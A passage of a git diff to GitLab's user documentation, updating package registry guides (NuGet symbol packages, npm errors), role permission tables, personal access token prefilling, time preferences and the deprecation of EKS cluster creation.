meet the naming convention + +Your package name may not meet the [`@scope/package-name` package naming convention](#package-naming-convention). Ensure the name meets the convention exactly, including the case. Then try to publish again. +#### Package already exists + +Your package has already been published to another project in the same +root namespace and therefore cannot be published again using the same name. + +This is also true even if the prior published package shares the same name, +but not the version. + ### `npm publish` returns `npm ERR! 500 Internal Server Error - PUT` This is a [known issue](https://gitlab.com/gitlab-org/gitlab/-/issues/238950) in GitLab diff --git a/doc/user/packages/nuget_repository/index.md b/doc/user/packages/nuget_repository/index.md index f19d565ef36..46cfd763668 100644 --- a/doc/user/packages/nuget_repository/index.md +++ b/doc/user/packages/nuget_repository/index.md @@ -8,6 +8,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/20050) in GitLab Premium 12.8. > - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/221259) to GitLab Free in 13.3. +> - Symbol package support [added](https://gitlab.com/gitlab-org/gitlab/-/issues/262081) in GitLab 14.1. Publish NuGet packages in your project's Package Registry. Then, install the packages whenever you need to use them as a dependency. @@ -28,7 +29,7 @@ The required minimum versions are: - [NuGet CLI 5.1 or later](https://www.nuget.org/downloads). If you have [Visual Studio](https://visualstudio.microsoft.com/vs/), the NuGet CLI is probably already installed. -- Alternatively, you can use [.NET SDK 3.0 or later](https://dotnet.microsoft.com/download/dotnet-core/3.0), +- Alternatively, you can use [.NET SDK 3.0 or later](https://dotnet.microsoft.com/download/dotnet/3.0), which installs the NuGet CLI. - NuGet protocol version 3 or later. @@ -336,7 +337,7 @@ updated: stage: deploy script: - dotnet pack -c Release - - dotnet nuget add source "${CI_API_V4_URL}/${CI_PROJECT_ID}/packages/nuget/index.json" --name gitlab --username gitlab-ci-token --password $CI_JOB_TOKEN --store-password-in-clear-text + - dotnet nuget add source "${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/nuget/index.json" --name gitlab --username gitlab-ci-token --password $CI_JOB_TOKEN --store-password-in-clear-text - dotnet nuget push "bin/Release/*.nupkg" --source gitlab only: - master @@ -394,6 +395,24 @@ dotnet add package <package_id> \ - `<package_id>` is the package ID. - `<package_version>` is the package version. Optional. +## Symbol packages + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/262081) in GitLab 14.1. + +If you push a `.nupkg`, symbol package files in the `.snupkg` format are uploaded automatically. You +can also push them manually: + +```shell +nuget push My.Package.snupkg -Source <source_name> +``` + +Consuming symbol packages is not yet guaranteed using clients such as Visual Studio or +dotnet-symbol. The `.snupkg` files are available for download through the UI or the +[API](../../../api/packages/nuget.md#download-a-package-file). + +Follow the [NuGet symbol package issue](https://gitlab.com/gitlab-org/gitlab/-/issues/262081) +for further updates. + ## Supported CLI commands The GitLab NuGet repository supports the following commands for the NuGet CLI (`nuget`) and the .NET @@ -403,3 +422,12 @@ CLI (`dotnet`): - `dotnet nuget push`: Upload a package to the registry. - `nuget install`: Install a package from the registry. - `dotnet add`: Install a package from the registry. + +## Troubleshooting + +To improve performance, NuGet caches files related to a package. If you encounter issues, clear the +cache with this command: + +```shell +nuget locals all -clear +``` diff --git a/doc/user/packages/package_registry/index.md b/doc/user/packages/package_registry/index.md index 52ce7d62940..cb4e677687e 100644 --- a/doc/user/packages/package_registry/index.md +++ b/doc/user/packages/package_registry/index.md @@ -34,8 +34,8 @@ For information on how to create and upload a package, view the GitLab documenta ## Use GitLab CI/CD to build packages -You can use [GitLab CI/CD](../../../ci/README.md) to build packages. -For Maven, NuGet, npm, Conan, and PyPI packages, and Composer dependencies, you can +You can use [GitLab CI/CD](../../../ci/index.md) to build packages. +For Maven, NuGet, npm, Conan, Helm, and PyPI packages, and Composer dependencies, you can authenticate with GitLab by using the `CI_JOB_TOKEN`. CI/CD templates, which you can use to get started, are in [this repository](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). @@ -94,7 +94,7 @@ To delete package files in the UI, from your group or project: 1. Go to **Packages & Registries > Package Registry**. 1. Find the name of the package you want to delete. 1. Select the package to view additional details. -1. Find the name of the file you would like to delete. +1. Find the name of the file you would like to delete. 1. Expand the ellipsis and select **Delete file**. The package files are permanently deleted. diff --git a/doc/user/packages/pypi_repository/index.md b/doc/user/packages/pypi_repository/index.md index 2dd00fdc273..30d61770094 100644 --- a/doc/user/packages/pypi_repository/index.md +++ b/doc/user/packages/pypi_repository/index.md @@ -204,7 +204,7 @@ Your project ID is on your project's home page. > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/202012) in GitLab 13.4. -To work with PyPI commands within [GitLab CI/CD](../../../ci/README.md), you +To work with PyPI commands within [GitLab CI/CD](../../../ci/index.md), you can use `CI_JOB_TOKEN` instead of a personal access token or deploy token. For example: @@ -320,7 +320,7 @@ python -m twine upload --repository <source_name> dist/<package_file> You cannot publish a package if a package of the same name and version already exists. You must delete the existing package first. If you attempt to publish the same package -more than once, a `404 Bad Request` error occurs. +more than once, a `400 Bad Request` error occurs. ## Install a PyPI package diff --git a/doc/user/packages/rubygems_registry/index.md b/doc/user/packages/rubygems_registry/index.md index 743bc229e11..2a0fea6e0ef 100644 --- a/doc/user/packages/rubygems_registry/index.md +++ b/doc/user/packages/rubygems_registry/index.md @@ -74,7 +74,7 @@ https://gitlab.example.com/api/v4/projects/<project_id>/packages/rubygems: '<you ### Authenticate with a CI job token -To work with RubyGems commands within [GitLab CI/CD](../../../ci/README.md), +To work with RubyGems commands within [GitLab CI/CD](../../../ci/index.md), you can use `CI_JOB_TOKEN` instead of a personal access token or deploy token. For example: diff --git a/doc/user/packages/terraform_module_registry/index.md b/doc/user/packages/terraform_module_registry/index.md index efb2b8ddf8e..1365f401506 100644 --- a/doc/user/packages/terraform_module_registry/index.md +++ b/doc/user/packages/terraform_module_registry/index.md @@ -15,8 +15,8 @@ as a Terraform module registry. To authenticate to the Terraform module registry, you need either: -- A [personal access token](../../../api/README.md#personalproject-access-tokens) with at least `read_api` rights. -- A [CI/CD job token](../../../api/README.md#gitlab-cicd-job-token). +- A [personal access token](../../../api/index.md#personalproject-access-tokens) with at least `read_api` rights. +- A [CI/CD job token](../../../api/index.md#gitlab-cicd-job-token). ## Publish a Terraform Module @@ -26,7 +26,7 @@ If a package with the same name and version already exists, it will not be creat Prerequisites: -- You need to [authenticate with the API](../../../api/README.md#authentication). If authenticating with a deploy token, it must be configured with the `write_package_registry` scope. +- You need to [authenticate with the API](../../../api/index.md#authentication). If authenticating with a deploy token, it must be configured with the `write_package_registry` scope. ```plaintext PUT /projects/:id/packages/terraform/modules/:module_name/:module_system/:module_version/file @@ -34,7 +34,7 @@ PUT /projects/:id/packages/terraform/modules/:module_name/:module_system/:module | Attribute | Type | Required | Description | | -------------------| --------------- | ---------| -------------------------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../../../api/README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../../../api/index.md#namespaced-path-encoding). | | `module_name` | string | yes | The package name. It can contain only lowercase letters (`a-z`), uppercase letter (`A-Z`), numbers (`0-9`), or hyphens (`-`). | `module_system` | string | yes | The package name. It can contain only lowercase letters (`a-z`), uppercase letter (`A-Z`), numbers (`0-9`), or hyphens (`-`). | `module_version` | string | yes | The package version. It must be valid according to the [Semantic Versioning Specification](https://semver.org/). @@ -77,7 +77,7 @@ Example response: Prerequisites: -- You need to [authenticate with the API](../../../api/README.md#authentication). If authenticating with a personal access token, it must be configured with the `read_api` scope. +- You need to [authenticate with the API](../../../api/index.md#authentication). If authenticating with a personal access token, it must be configured with the `read_api` scope. Authentication tokens (Job Token or Personal Access Token) can be provided for `terraform` in your `~/.terraformrc` file: @@ -99,7 +99,7 @@ module "<module>" { ## Publish a Terraform module by using CI/CD -To work with Terraform modules in [GitLab CI/CD](../../../ci/README.md), you can use +To work with Terraform modules in [GitLab CI/CD](../../../ci/index.md), you can use `CI_JOB_TOKEN` in place of the personal access token in your commands. For example: diff --git a/doc/user/permissions.md b/doc/user/permissions.md index 6739d08e156..0c3428ee7ee 100644 --- a/doc/user/permissions.md +++ b/doc/user/permissions.md @@ -49,8 +49,10 @@ The following table lists project permissions available for each role: | View allowed and denied licenses **(ULTIMATE)** | ✓ (*1*) | ✓ | ✓ | ✓ | ✓ | | View License Compliance reports **(ULTIMATE)** | ✓ (*1*) | ✓ | ✓ | ✓ | ✓ | | View Security reports **(ULTIMATE)** | ✓ (*3*) | ✓ | ✓ | ✓ | ✓ | -| View Dependency list **(ULTIMATE)** | ✓ (*1*) | ✓ | ✓ | ✓ | ✓ | -| View License list **(ULTIMATE)** | ✓ (*1*) | ✓ | ✓ | ✓ | ✓ | +| View Dependency list **(ULTIMATE)** | | | ✓ | ✓ | ✓ | +| View License list **(ULTIMATE)** | | ✓ | ✓ | ✓ | ✓ | +| View [Threats list](application_security/threat_monitoring/#threat-monitoring) **(ULTIMATE)** | | | ✓ | ✓ | ✓ | +| Create and run [on-demand DAST scans](application_security/dast/#on-demand-scans) | | | ✓ | ✓ | ✓ | | View licenses in Dependency list **(ULTIMATE)** | ✓ (*1*) | ✓ | ✓ | ✓ | ✓ | | View [Design Management](project/issues/design_management.md) pages | ✓ | ✓ | ✓ | ✓ | ✓ | | View project code | ✓ (*1*) | ✓ | ✓ | ✓ | ✓ | @@ -59,7 +61,7 @@ The following table lists project permissions available for each role: | View wiki pages | ✓ | ✓ | ✓ | ✓ | ✓ | | See a list of jobs | ✓ (*3*) | ✓ | ✓ | ✓ | ✓ | | See a job log | ✓ (*3*) | ✓ | ✓ | ✓ | ✓ | -| See a job with [debug logging](../ci/variables/README.md#debug-logging) | | | ✓ | ✓ | ✓ | +| See a job with [debug logging](../ci/variables/index.md#debug-logging) | | | ✓ | ✓ | ✓ | | Download and browse job artifacts | ✓ (*3*) | ✓ | ✓ | ✓ | ✓ | | Create confidential issue | ✓ | ✓ | ✓ | ✓ | ✓ | | Create new issue | ✓ | ✓ | ✓ | ✓ | ✓ | @@ -105,8 +107,7 @@ The following table lists project permissions available for each role: | Publish [packages](packages/index.md) | | | ✓ | ✓ | ✓ | | Create/edit/delete a Cleanup policy | | | ✓ | ✓ | ✓ | | Upload [Design Management](project/issues/design_management.md) files | | | ✓ | ✓ | ✓ | -| Create/edit [releases](project/releases/index.md)| | | ✓ | ✓ | ✓ | -| Delete [releases](project/releases/index.md)| | | | ✓ | ✓ | +| Create/edit/delete [releases](project/releases/index.md)| | | ✓ (*13*) | ✓ (*13*) | ✓ (*13*) | | Manage merge approval rules (project settings) | | | | ✓ | ✓ | | Create new merge request | | | ✓ | ✓ | ✓ | | Create new branches | | | ✓ | ✓ | ✓ | @@ -169,6 +170,8 @@ The following table lists project permissions available for each role: | Manage Project Operations | | | | ✓ | ✓ | | Manage Terraform state | | | | ✓ | ✓ | | Manage license policy **(ULTIMATE)** | | | | ✓ | ✓ | +| Manage security policy **(ULTIMATE)** | | | ✓ | ✓ | ✓ | +| Create or assign security policy project **(ULTIMATE)** | | | | | ✓ | | Edit comments (posted by any user) | | | | ✓ | ✓ | | Reposition comments on images (posted by any user)|✓ (*10*) | ✓ (*10*) | ✓ (*10*) | ✓ | ✓ | | Manage Error Tracking | | | | ✓ | ✓ | @@ -195,7 +198,7 @@ The following table lists project permissions available for each role: 1. Guest users can only view the confidential issues they created themselves. 1. If **Public pipelines** is enabled in **Project Settings > CI/CD**. 1. Not allowed for Guest, Reporter, Developer, Maintainer, or Owner. See [protected branches](project/protected_branches.md). -1. If the [branch is protected](project/protected_branches.md#using-the-allowed-to-merge-and-allowed-to-push-settings), this depends on the access Developers and Maintainers are given. +1. If the [branch is protected](project/protected_branches.md), this depends on the access Developers and Maintainers are given. 1. Guest users can access GitLab [**Releases**](project/releases/index.md) for downloading assets but are not allowed to download the source code nor see repository information like tags and commits. 1. Actions are limited only to records owned (referenced) by user. 1. When [Share Group Lock](group/index.md#prevent-a-project-from-being-shared-with-groups) is enabled the project can't be shared with other groups. It does not affect group with group sharing. @@ -204,7 +207,8 @@ The following table lists project permissions available for each role: 1. Applies only to comments on [Design Management](project/issues/design_management.md) designs. 1. Users can only view events based on their individual actions. 1. Project access tokens are supported for self-managed instances on Free and above. They are also - supported on GitLab SaaS Premium and above (excluding [trial licenses](https://about.gitlab.com/free-trial)). + supported on GitLab SaaS Premium and above (excluding [trial licenses](https://about.gitlab.com/free-trial/)). +1. If the [tag is protected](#release-permissions-with-protected-tags), this depends on the access Developers and Maintainers are given. ## Project features permissions @@ -223,7 +227,7 @@ which visibility level you select on project settings. Additional restrictions can be applied on a per-branch basis with [protected branches](project/protected_branches.md). Additionally, you can customize permissions to allow or prevent project Maintainers and Developers from pushing to a protected branch. Read through the documentation on -[Allowed to Merge and Allowed to Push settings](project/protected_branches.md#using-the-allowed-to-merge-and-allowed-to-push-settings) +[protected branches](project/protected_branches.md) to learn more. ### Value Stream Analytics permissions @@ -261,50 +265,50 @@ The following table lists group permissions available for each role: | Action | Guest | Reporter | Developer | Maintainer | Owner | |--------------------------------------------------------|-------|----------|-----------|------------|-------| | Browse group | ✓ | ✓ | ✓ | ✓ | ✓ | +| Edit SAML SSO Billing **(PREMIUM SAAS)** | ✓ | ✓ | ✓ | ✓ | ✓ (4) | +| View Contribution analytics | ✓ | ✓ | ✓ | ✓ | ✓ | +| View group epic **(PREMIUM)** | ✓ | ✓ | ✓ | ✓ | ✓ | | View group wiki pages **(PREMIUM)** | ✓ (6) | ✓ | ✓ | ✓ | ✓ | +| View Insights **(ULTIMATE)** | ✓ | ✓ | ✓ | ✓ | ✓ | | View Insights charts **(ULTIMATE)** | ✓ | ✓ | ✓ | ✓ | ✓ | -| View group epic **(PREMIUM)** | ✓ | ✓ | ✓ | ✓ | ✓ | +| View Issue analytics **(PREMIUM)** | ✓ | ✓ | ✓ | ✓ | ✓ | +| View Value Stream analytics | ✓ | ✓ | ✓ | ✓ | ✓ | | Create/edit group epic **(PREMIUM)** | | ✓ | ✓ | ✓ | ✓ | | Create/edit/delete epic boards **(PREMIUM)** | | ✓ | ✓ | ✓ | ✓ | | Manage group labels | | ✓ | ✓ | ✓ | ✓ | -| See a container registry | | ✓ | ✓ | ✓ | ✓ | | Pull [packages](packages/index.md) | | ✓ | ✓ | ✓ | ✓ | -| Publish [packages](packages/index.md) | | | ✓ | ✓ | ✓ | +| View a container registry | | ✓ | ✓ | ✓ | ✓ | +| View Group DevOps Adoption **(ULTIMATE)** | | ✓ | ✓ | ✓ | ✓ | | View metrics dashboard annotations | | ✓ | ✓ | ✓ | ✓ | +| View Productivity analytics **(PREMIUM)** | | ✓ | ✓ | ✓ | ✓ | +| Create and edit group wiki pages **(PREMIUM)** | | | ✓ | ✓ | ✓ | | Create project in group | | | ✓ (3)(5) | ✓ (3) | ✓ (3) | -| Share (invite) groups with groups | | | | | ✓ | | Create/edit/delete group milestones | | | ✓ | ✓ | ✓ | | Create/edit/delete iterations | | | ✓ | ✓ | ✓ | +| Create/edit/delete metrics dashboard annotations | | | ✓ | ✓ | ✓ | | Enable/disable a dependency proxy | | | ✓ | ✓ | ✓ | -| Create and edit group wiki pages **(PREMIUM)** | | | ✓ | ✓ | ✓ | +| Publish [packages](packages/index.md) | | | ✓ | ✓ | ✓ | | Use security dashboard **(ULTIMATE)** | | | ✓ | ✓ | ✓ | -| Create/edit/delete metrics dashboard annotations | | | ✓ | ✓ | ✓ | -| View/manage group-level Kubernetes cluster | | | | ✓ | ✓ | +| View group Audit Events | | | ✓ (7) | ✓ (7) | ✓ | | Create subgroup | | | | ✓ (1) | ✓ | | Delete group wiki pages **(PREMIUM)** | | | | ✓ | ✓ | | Edit epic comments (posted by any user) **(ULTIMATE)** | | | | ✓ (2) | ✓ (2) | -| Edit group settings | | | | | ✓ | -| Manage group level CI/CD variables | | | | | ✓ | | List group deploy tokens | | | | ✓ | ✓ | +| Manage [group push rules](group/index.md#group-push-rules) **(PREMIUM)** | | | | ✓ | ✓ | +| View/manage group-level Kubernetes cluster | | | | ✓ | ✓ | +| Administer project compliance frameworks | | | | | ✓ | | Create/Delete group deploy tokens | | | | | ✓ | -| Manage group members | | | | | ✓ | | Delete group | | | | | ✓ | | Delete group epic **(PREMIUM)** | | | | | ✓ | -| Edit SAML SSO Billing **(PREMIUM SAAS)** | ✓ | ✓ | ✓ | ✓ | ✓ (4) | -| View group Audit Events | | | ✓ (7) | ✓ (7) | ✓ | | Disable notification emails | | | | | ✓ | -| View Contribution analytics | ✓ | ✓ | ✓ | ✓ | ✓ | -| View Group DevOps Adoption **(ULTIMATE)** | | ✓ | ✓ | ✓ | ✓ | -| View Insights **(ULTIMATE)** | ✓ | ✓ | ✓ | ✓ | ✓ | -| View Issue analytics **(PREMIUM)** | ✓ | ✓ | ✓ | ✓ | ✓ | -| View Productivity analytics **(PREMIUM)** | | ✓ | ✓ | ✓ | ✓ | -| View Value Stream analytics | ✓ | ✓ | ✓ | ✓ | ✓ | +| Edit group settings | | | | | ✓ | +| Filter members by 2FA status | | | | | ✓ | +| Manage group level CI/CD variables | | | | | ✓ | +| Manage group members | | | | | ✓ | +| Share (invite) groups with groups | | | | | ✓ | +| View 2FA status of members | | | | | ✓ | | View Billing **(FREE SAAS)** | | | | | ✓ (4) | | View Usage Quotas **(FREE SAAS)** | | | | | ✓ (4) | -| Manage [group push rules](group/index.md#group-push-rules) **(PREMIUM)** | | | | ✓ | ✓ | -| View 2FA status of members | | | | | ✓ | -| Filter members by 2FA status | | | | | ✓ | -| Administer project compliance frameworks | | | | | ✓ | 1. Groups can be set to [allow either Owners or Owners and Maintainers to create subgroups](group/subgroups/index.md#creating-a-subgroup) @@ -521,6 +525,14 @@ run CI/CD pipelines and execute actions on jobs that are related to those branch See [Security on protected branches](../ci/pipelines/index.md#pipeline-security-on-protected-branches) for details about the pipelines security model. +## Release permissions with protected tags + +[The permission to create tags](project/protected_tags.md) is used to define if a user can +create, edit, and delete [Releases](project/releases/index.md). + +See [Release permissions](project/releases/index.md#release-permissions) +for more information. + ## LDAP users permissions In GitLab 8.15 and later, LDAP user permissions can now be manually overridden by an admin user. diff --git a/doc/user/profile/account/two_factor_authentication.md b/doc/user/profile/account/two_factor_authentication.md index 3f42fc0d131..597170540ab 100644 --- a/doc/user/profile/account/two_factor_authentication.md +++ b/doc/user/profile/account/two_factor_authentication.md @@ -366,7 +366,7 @@ Support for disabling 2FA is limited, depending on your subscription level. For When 2FA is enabled, you can no longer use your normal account password to authenticate with Git over HTTPS on the command line or when using -the [GitLab API](../../../api/README.md). You must use a +the [GitLab API](../../../api/index.md). You must use a [personal access token](../personal_access_tokens.md) instead. ## Recovery options @@ -507,7 +507,7 @@ If you are receiving an `invalid pin code` error, this may indicate that there i To avoid the time sync issue, enable time synchronization in the device that generates the codes. For example: -- For Android (Google Authenticator): +- For Android (Google Authenticator): 1. Go to the Main Menu in Google Authenticator. 1. Select Settings. 1. Select the Time correction for the codes. diff --git a/doc/user/profile/img/unknown_sign_in_email_v14_0.png b/doc/user/profile/img/unknown_sign_in_email_v14_0.png Binary files differindex dec1251addb..62634739b78 100644 --- a/doc/user/profile/img/unknown_sign_in_email_v14_0.png +++ b/doc/user/profile/img/unknown_sign_in_email_v14_0.png diff --git a/doc/user/profile/index.md b/doc/user/profile/index.md index 9d714a6efd0..d49f4ab0c16 100644 --- a/doc/user/profile/index.md +++ b/doc/user/profile/index.md @@ -79,6 +79,16 @@ The following is hidden from your user profile page (`https://gitlab.example.com NOTE: Making your user profile page private does not hide your public resources from the REST or GraphQL APIs. +### User visibility + +The public page of a user, located at `/username`, is always visible whether you are signed-in or +not. + +When visiting the public page of a user, you can only see the projects which you have privileges to. + +If the [public level is restricted](../admin_area/settings/visibility_and_access_controls.md#restricted-visibility-levels), +user profiles are only visible to signed-in users. + ## Add external accounts to your user profile page You can add links to certain other external accounts you might have, like Skype and Twitter. @@ -98,7 +108,7 @@ To add links to other accounts: > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/14078) in GitLab 11.3. -In the user contribution calendar graph and recent activity list, you can show contributions to private projects. +In the user contribution calendar graph and recent activity list, you can see your [contribution actions](../../api/events.md#action-types) to private projects. To show private contributions: @@ -280,6 +290,6 @@ Without the `config.extend_remember_period` flag, you would be forced to sign in - [Receive emails for sign-ins from unknown IP addresses or devices](unknown_sign_in_notification.md) - Manage applications that can [use GitLab as an OAuth provider](../../integration/oauth_provider.md#introduction-to-oauth) - Manage [personal access tokens](personal_access_tokens.md) to access your account via API and authorized applications -- Manage [SSH keys](../../ssh/README.md) to access your account via SSH +- Manage [SSH keys](../../ssh/index.md) to access your account via SSH - Change your [syntax highlighting theme](preferences.md#syntax-highlighting-theme) - [View your active sessions](active_sessions.md) and revoke any of them if necessary diff --git a/doc/user/profile/notifications.md b/doc/user/profile/notifications.md index b9410be791e..eaf1d33a938 100644 --- a/doc/user/profile/notifications.md +++ b/doc/user/profile/notifications.md @@ -176,14 +176,14 @@ Users are notified of the following events: | Event | Sent to | Settings level | |------------------------------|---------------------|------------------------------| | New SSH key added | User | Security email, always sent. | -| SSH key has expired | User | Security email, always sent. | +| SSH key has expired | User | Security email, always sent. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/322637) in GitLab 13.12 | | New email added | User | Security email, always sent. | | Email changed | User | Security email, always sent. | | Password changed | User | Security email, always sent when user changes their own password | | Password changed by administrator | User | Security email, always sent when an administrator changes the password of another user | | Two-factor authentication disabled | User | Security email, always sent. | | New user created | User | Sent on user creation, except for OmniAuth (LDAP)| -| New SAML/SCIM user provisioned. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/276018) in GitLab 13.8 | User | Sent when a user is provisioned through SAML/SCIM | +| New SAML/SCIM user provisioned | User | Sent when a user is provisioned through SAML/SCIM. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/276018) in GitLab 13.8 | | User added to project | User | Sent when user is added to project | | Project access level changed | User | Sent when user project access level is changed | | User added to group | User | Sent when user is added to group | @@ -237,10 +237,10 @@ epics: | Close merge request | | | Due issue | Participants and Custom notification level with this event selected | | Failed pipeline | The author of the pipeline | -| Fixed pipeline ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/24309) in GitLab 13.1.) | The author of the pipeline. Enabled by default. | +| Fixed pipeline | The author of the pipeline. Enabled by default. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/24309) in GitLab 13.1 | | Merge merge request | | -| Merge when pipeline succeeds ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/211961) in GitLab 13.4) | Author, Participants, Watchers, Subscribers, and Custom notification level with this event selected. `Note:` Custom notification level is ignored for Author, Watchers and Subscribers | -| Merge request [marked as ready](../project/merge_requests/drafts.md) (introduced in [GitLab 13.10](https://gitlab.com/gitlab-org/gitlab/-/issues/15332)) | Watchers and participants | +| Merge when pipeline succeeds | Author, Participants, Watchers, Subscribers, and Custom notification level with this event selected. Custom notification level is ignored for Author, Watchers and Subscribers. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/211961) in GitLab 13.4 | +| Merge request [marked as ready](../project/merge_requests/drafts.md) | Watchers and participants. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/15332) in GitLab 13.10 | | New comment | Participants, Watchers, Subscribers, and Custom notification level with this event selected, plus anyone mentioned by `@username` in the comment, with notification level "Mention" or higher | | New epic | | | New issue | | diff --git a/doc/user/profile/personal_access_tokens.md b/doc/user/profile/personal_access_tokens.md index 7b63a5bfef9..0dbf00a83fb 100644 --- a/doc/user/profile/personal_access_tokens.md +++ b/doc/user/profile/personal_access_tokens.md @@ -11,16 +11,17 @@ info: To determine the technical writer assigned to the Stage/Group associated w > - [Notifications for expiring tokens](https://gitlab.com/gitlab-org/gitlab/-/issues/3649) added in GitLab 12.6. > - [Token lifetime limits](https://gitlab.com/gitlab-org/gitlab/-/issues/3649) added in [GitLab Ultimate](https://about.gitlab.com/pricing/) 12.6. > - [Additional notifications for expiring tokens](https://gitlab.com/gitlab-org/gitlab/-/issues/214721) added in GitLab 13.3. +> - [Prefill token name and scopes](https://gitlab.com/gitlab-org/gitlab/-/issues/334664) added in GitLab 14.1. -If you're unable to use [OAuth2](../../api/oauth2.md), you can use a personal access token to authenticate with the [GitLab API](../../api/README.md#personalproject-access-tokens). You can also use a personal access token with Git to authenticate over HTTP. +If you're unable to use [OAuth2](../../api/oauth2.md), you can use a personal access token to authenticate with the [GitLab API](../../api/index.md#personalproject-access-tokens). You can also use a personal access token with Git to authenticate over HTTP. In both cases, you authenticate with a personal access token in place of your password. -Personal access tokens are required when [Two-Factor Authentication (2FA)](account/two_factor_authentication.md) is enabled. +Personal access tokens are required when [Two-Factor Authentication (2FA)](account/two_factor_authentication.md) is enabled. -For examples of how you can use a personal access token to authenticate with the API, see the [API documentation](../../api/README.md#personalproject-access-tokens). +For examples of how you can use a personal access token to authenticate with the API, see the [API documentation](../../api/index.md#personalproject-access-tokens). -Alternately, GitLab administrators can use the API to create [impersonation tokens](../../api/README.md#impersonation-tokens). +Alternately, GitLab administrators can use the API to create [impersonation tokens](../../api/index.md#impersonation-tokens). Use impersonation tokens to automate authentication as a specific user. ## Create a personal access token @@ -37,6 +38,16 @@ You can create as many personal access tokens as you like. Save the personal access token somewhere safe. After you leave the page, you no longer have access to the token. +### Prefill personal access token name and scopes + +You can link directly to the Personal Access Token page and have the form prefilled with a name and +list of scopes. To do this, you can append a `name` parameter and a list of comma-separated scopes +to the URL. For example: + +```plaintext +https://gitlab.example.com/-/profile/personal_access_tokens?name=Example+Access+token&scopes=api,read_user,read_registry +``` + ## Revoke a personal access token At any time, you can revoke a personal access token. @@ -82,7 +93,7 @@ Personal access tokens expire on the date you define, at midnight UTC. - In GitLab Ultimate, administrators can [limit the lifetime of personal access tokens](../admin_area/settings/account_and_limit_settings.md#limit-the-lifetime-of-personal-access-tokens). - In GitLab Ultimate, administrators can choose whether or not to - [enforce personal access token expiration](../admin_area/settings/account_and_limit_settings.md#do-not-enforce-personal-access-token-expiration). + [enforce personal access token expiration](../admin_area/settings/account_and_limit_settings.md#allow-expired-personal-access-tokens-to-be-used). ## Create a personal access token programmatically **(FREE SELF)** @@ -104,10 +115,10 @@ To create a personal access token programmatically: ``` 1. Run the following commands to reference the username, the token, and the scopes. - + The token must be 20 characters long. The scopes must be valid and are visible [in the source code](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/auth.rb). - + For example, to create a token that belongs to a user with username `automation-bot`: ```ruby @@ -141,7 +152,7 @@ To revoke a token programmatically: ```shell sudo gitlab-rails console ``` - + 1. To revoke a token of `token-string-here123`, run the following commands: ```ruby diff --git a/doc/user/profile/preferences.md b/doc/user/profile/preferences.md index 540724f9185..fad9b67eee4 100644 --- a/doc/user/profile/preferences.md +++ b/doc/user/profile/preferences.md @@ -163,7 +163,31 @@ You can choose one of the following options as the first day of the week: - Sunday - Monday -If you select **System Default**, the system-wide default setting is used. +If you select **System Default**, the [instance default](../admin_area/settings/index.md#default-first-day-of-the-week) setting is used. + +## Time preferences + +### Use relative times + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/65570) in GitLab 14.1. + +You can select your preferred time format for the GitLab user interface: + +- Relative times, for example, `30 minutes ago`. +- Absolute times, for example, `May 18, 2021, 3:57 PM`. + +The times are formatted depending on your chosen language and browser locale. + +To set your time preference: + +1. On the **Preferences** page, go to **Time preferences**. +1. Select the **Use relative times** checkbox to use relative times, + or clear the checkbox to use absolute times. +1. Select **Save changes**. + +NOTE: +This feature is experimental, and choosing absolute times might break certain layouts. +Please open an issue if you notice that using absolute times breaks a layout. ## Integrations diff --git a/doc/user/project/canary_deployments.md b/doc/user/project/canary_deployments.md index c3900d33cb8..cac283f6f18 100644 --- a/doc/user/project/canary_deployments.md +++ b/doc/user/project/canary_deployments.md @@ -92,7 +92,7 @@ Here's an example setup flow from scratch: 1. Prepare an [Auto DevOps-enabled](../../topics/autodevops/index.md) project. 1. Set up a [Kubernetes Cluster](../../user/project/clusters/index.md) in your project. 1. Install [NGINX Ingress](https://github.com/kubernetes/ingress-nginx/tree/master/charts/ingress-nginx) in your cluster. -1. Set up [the base domain](../../user/project/clusters/index.md#base-domain) based on the Ingress +1. Set up [the base domain](../../user/project/clusters/gitlab_managed_clusters.md#base-domain) based on the Ingress Endpoint assigned above. 1. Check if [`v2.0.0+` of `auto-deploy-image` is used in your Auto DevOps pipelines](../../topics/autodevops/upgrading_auto_deploy_dependencies.md#verify-dependency-versions). If it isn't, follow the documentation to specify the image version. diff --git a/doc/user/project/clusters/add_eks_clusters.md b/doc/user/project/clusters/add_eks_clusters.md index 58bdb3d698f..7d006247177 100644 --- a/doc/user/project/clusters/add_eks_clusters.md +++ b/doc/user/project/clusters/add_eks_clusters.md @@ -4,85 +4,57 @@ group: Configure info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Adding EKS clusters **(FREE)** +# EKS clusters (DEPRECATED) **(FREE)** -GitLab supports adding new and existing EKS clusters. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/22392) in GitLab 12.5. +> - [Deprecated](https://gitlab.com/gitlab-org/gitlab/-/issues/327908) in GitLab 14.0. -## EKS requirements +WARNING: +Use [Infrastrucure as Code](../../infrastructure/index.md) to create new clusters. The method described in this document is deprecated as of GitLab 14.0. -Before creating your first cluster on Amazon EKS with the GitLab integration, make sure the following -requirements are met: +Through GitLab, you can create new clusters and add existing clusters hosted on Amazon Elastic +Kubernetes Service (EKS). -- An [Amazon Web Services](https://aws.amazon.com/) account is set up and you are able to log in. -- You have permissions to manage IAM resources. -- If you want to use an [existing EKS 